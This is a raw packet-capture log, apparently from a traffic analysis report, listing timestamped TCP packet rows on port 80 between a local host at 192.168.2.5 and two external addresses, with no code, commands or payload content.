                                                                          Sep 27, 2024 04:21:17.871416092 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.871432066 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.871443987 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.871448040 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.871453047 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.871463060 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.871473074 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.871475935 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.871484041 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.871498108 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.871504068 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.871507883 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.871521950 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.871526003 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.871532917 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.871555090 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.871565104 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.871575117 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.871577024 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.871597052 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.871625900 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.871640921 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.871651888 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.871661901 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.871674061 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.871680021 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.871685982 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.871690035 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.871718884 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.871759892 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.871763945 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.871774912 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.871784925 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.871804953 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.871838093 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.871838093 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.871848106 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.871859074 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.871872902 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.871896029 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.871932030 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.871970892 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.872163057 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.872191906 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.872201920 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.872210026 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.872242928 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.872258902 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.872273922 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.872286081 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.872294903 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.872297049 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.872306108 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.872318029 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.872328043 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.872330904 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.872365952 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.872410059 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.872420073 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.872431040 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.872442007 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.872453928 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.872477055 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.872478008 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.872488976 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.872498989 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.872534990 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.872549057 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.872559071 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.872569084 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.872581959 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.872591972 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.872597933 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.872621059 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.872703075 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.872713089 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.872723103 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.872747898 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.872761011 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.872762918 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.872771978 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.872781992 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.872796059 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.872797012 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.872807026 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.872819901 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.872853994 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.874089003 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.874130964 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.874138117 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.874152899 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.874171972 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.874197960 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.874212980 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.874222040 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.874233007 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.874243021 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.874244928 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.874257088 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.874279022 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.874313116 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.875545025 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.875556946 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.875566959 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.875627995 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.875628948 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.875638962 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.875650883 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.875662088 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.875672102 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.875691891 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.875691891 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.875894070 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.876789093 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.876832962 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.876841068 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.876864910 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.876879930 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.876890898 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.876905918 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.876929045 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.876938105 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.876938105 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.876940012 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.876955032 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.876965046 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.876980066 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.876980066 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.877078056 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.910983086 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.910995007 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.911005020 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.911036968 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.911047935 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.911058903 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.911067963 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.911067963 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.911070108 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.911082029 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.911149025 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.913203955 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.913223028 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.913233042 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.913285971 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.913285971 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.913321972 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.913332939 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.913343906 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.913357973 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.913369894 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.913388014 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.913388014 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.914650917 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.916536093 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.916590929 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.916667938 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.916677952 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.916696072 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.916703939 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.916712046 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.916822910 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.916832924 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.916845083 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.916851997 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.916855097 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.916865110 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.916874886 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.916876078 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.916886091 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.916898966 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.916908026 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.916909933 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.916918993 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.916928053 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.916932106 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.916939020 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.916949987 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.916949987 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.916960955 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.916971922 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.916974068 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.917000055 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.917013884 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.917025089 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.917035103 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.917040110 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.917045116 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.917053938 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.917081118 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.917089939 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.917099953 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.917109966 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.917125940 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.917129040 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.917138100 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.917144060 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.917146921 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.917171955 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.917197943 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.917208910 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.917239904 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.917248011 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.917258024 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.917267084 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.917278051 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.917300940 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.917371988 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.917382956 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.917393923 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.917404890 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.917412043 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.917414904 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.917424917 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.917448044 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.917454958 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.917464972 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.917475939 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.917495012 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.917505026 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.917517900 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.917526960 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.917546988 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.917547941 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.917560101 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.917576075 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.917691946 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.917702913 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.917712927 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.917722940 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.917738914 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.917742968 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.917768955 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.917787075 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.917797089 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.917799950 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.917799950 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.917808056 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.917819023 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.917845964 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.917845964 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.917900085 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.917911053 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.917939901 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.917978048 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.917989016 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.917999029 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.918016911 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.918016911 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.918047905 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.918082952 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.918092966 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.918102026 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.918142080 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.918142080 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.919214964 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.919225931 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.919236898 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.919260025 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.919270992 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.919275045 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.919275045 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.919282913 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.919292927 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.919302940 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.919312000 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.919312000 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.919440031 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.919738054 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.919749022 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.919759035 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.919786930 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.919786930 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.919821024 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.919831038 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.919841051 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.919852972 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.919863939 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.919867039 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.919867039 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.919886112 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.920404911 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.920416117 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.920425892 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.920444012 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.920444012 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.920474052 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.920483112 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.920491934 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.920502901 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.920514107 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.920525074 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.920536995 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.920536995 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.920589924 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.920595884 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.920600891 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.920644999 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.920656919 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.920684099 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.920684099 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.920691967 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.920732021 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.920747995 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.920758963 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.920768976 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.920778990 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.920798063 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.920798063 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.921003103 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.921077967 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.921087027 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.921097040 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.921108007 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.921118021 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.921128035 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.921138048 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.921144962 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.921145916 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.921149969 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.921180010 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.921180010 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.921297073 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.921308041 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.921318054 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.921329021 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.921339989 CEST8049725185.215.113.117192.168.2.5
